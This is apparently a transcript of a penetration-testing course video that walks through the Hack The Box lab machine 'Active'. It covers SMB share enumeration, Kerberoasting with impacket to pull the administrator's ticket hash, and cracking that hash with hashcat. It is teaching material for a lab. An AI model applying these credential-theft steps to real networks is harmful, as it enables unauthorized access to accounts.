think it's a capital u we'll just type in dash dash help and make sure that we do this right so we're gonna have a user this time it is a lowercase U and a lowercase b so what we will do it tells us a password or an ntlm hash this ntlm hash we're going to see this later this hash is one that we're going to pull down from an active directory Network a domain controller can give us this NTM this ntlm hash sometimes you can grab these with responder which we're also going to see later so it caught me off guard when I saw that ntlm hash I didn't realize that was a part of SMB map so that's interesting so note that because we are going to see that later we're not going to use the hash in order to grab this later in order to go into SMB map later but it's always useful to know that we can do this in the future just in case we have this hash and we're not able to crack it so what this gives us the usage here so the way we're going to do this is we're going to SMB map Dash U and our username was SVC TGs and our password was gpp still standing strong we'll paste that in and then it looks like we give it the host which is 10 10 10 100. and then this should run and it'll tell us if we have access to any other shares that we didn't have access to before and we do we have access to users we have access to CIS of all now we have this net login and so in a normal situation what you're going to do is you're going to go ahead and you will look in all these that we now have read access to so that we can enumerate some more but we're not actually not going to go that route because that's not the route we need to go but you just go through and you do the exact same thing we just did in order to find this user in this password and you just go ahead and look through here and see if you can find any more information that would help you gain access to the network and so show you real quick you can see the difference up here we anonymously had read only right here but now that we have a user we have access to different shares and this will be helpful sometimes you will find a user or you'll have Anonymous login and you'll only have access to one share and then you'll find another user and you'll have access to two shares and then you'll find another user and you'll finally be able to get onto the network that does happen and it does take time and it does take time to go through and enumerate all of these but you just got to be patient and run through the enumeration the way it's supposed to be done and we're going to continue on with the Box active I'm going to show you two different tools from impacket first uh we'll just come over here and this is what it looks like it's in packet get NP users and then it's the domain controller the IP so we give it the IP we give it the name which is active.htb a lot of times you're going to see in hack the Box this has htb but elsewhere you're going to see this is the username.local we're actually going to see one later that has a DOT local and then the username and let's pretend we found a username but we don't have a password and so what we would do is we'd try and go Dash no dash pass and see if we can get a TGT from this service and so unfortunately we're going to run it but we're not able to get a TGT but we are going to see this again we're going to try this again in another box in the future and I don't actually remember if it works or not so we will try it out and see if we can get this TGT if you get a ticket back you can do a pass the ticket attack and the tickets last you usually I think it's I think it's 10 hours default by windows so you can use that ticket I also see that I got this IP wrong you can use that ticket and see what you're able to have access to and we're going to go ahead and we're going to show another impacket tool so it will look like this and pack it Dash get and I think that it is users yes it's this one see here's a box that was done as spooky.local that one I think is from try hack me if I'm remembering right now we'll go ahead and type in our active dot htb slash SVC Dash TGs we can delete this and then we'll go ahead and we'll paste in our password here so that we can get this hash so as you can see in packet we're going to use impact it here once we're going to here use it again twice and then we're going to use it a third time to actually get our shell on this box so it's really important for us to use impact it and to know how to use it and to make sure you have it I told you before earlier in this course that if any penetration tester is told they can have one tool this is usually the tool they're going to go after so for some reason this doesn't seem to want to run all right so the problem turned out to be I had a dash right here and it needed to be an underscore so now that we got that resolved what we can see is we now have the name administrator here that it has spit down for us and it did not give us the hash so we're going to go ahead and run this again oh it says that the clock skew is too great okay so this is my box clock the my Kali Linux box right here the time does not match the time on the kerberost Windows machine right here so you can see the difference so this error you are going to get this every single time you ever run this every single time I've run this it always tells me the clocks don't match I think you have to be within an hour and I don't remember how to fix this so you just paste it in here and there's going to be a simple way to update this clock in one of these up here so we'll go ahead and paste that in and it's going to tell us how to fix this so because our time is not linked and the mitigation for it this is what we're looking for maybe it'll be in this GitHub page I will go ahead and find this and bring you back once I have the mitigation for this it turns out what you end up having to do is type in sudo apt install ntp date go ahead and run it it will install and then in order to link up your time you just type sheet type in sudo ntp date and then the IP address and you hit enter and that will go ahead and update the time and then you'll go back over to the active directory box that we're working on and you'll go ahead and run this command and you will get this output and so we have the administrator name here and this is their ticket so go ahead and copy that and we'll CD into desktop team hdb and then we'll go into active and then we're going to name this G edit hash Dot txt and we will paste in the hash and we can save it and we're going to use hashcat to crack this we'll type in cat and we'll hashtag hash cat and then we can go ahead and copy this paste it in here and we're told we need to use one three one one hundred and so that will be the hashcat type we're going to use so we'll go ahead and type in hash cat Dash m one three one 0 0 hash dot txt dash a and we're going to use the word list Rock U so we'll go ahead and locate Rock U Dot txt we will copy this and now we can go hashcat all over again Dash m one three one zero zero and then we'll go hash and then we'll paste in the directions to our word list and we'll see if that runs this will take a minute so I will bring you back once hashcat is finished running all right hashcat it has finished running and here is the password for this hash you can go ahead and copy this and we'll go g edit notes and we can type in all right I think the user was administrator so we can come up here and it's on a different link but it's administ admin is Trader and then this is the password and we're going to go ahead and log into that in the next video but what we just did is called curb roasting so we had the ticket graining service and it reached out to the domain controller and we were able to pull down the administrator with their hash and with that we were able to crack it and grab this password and so in the next video because there is no winrm on this box we're going to go and get a shell on this active directory Network in a different way and with that I'll see you there
Info
Channel: Ryan John
Views: 7,180
Rating: undefined out of 5
Keywords:
Id: JCicKrCO6A0
Channel Id: undefined
Length: 74min 59sec (4499 seconds)
Published: Fri Feb 10 2023
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.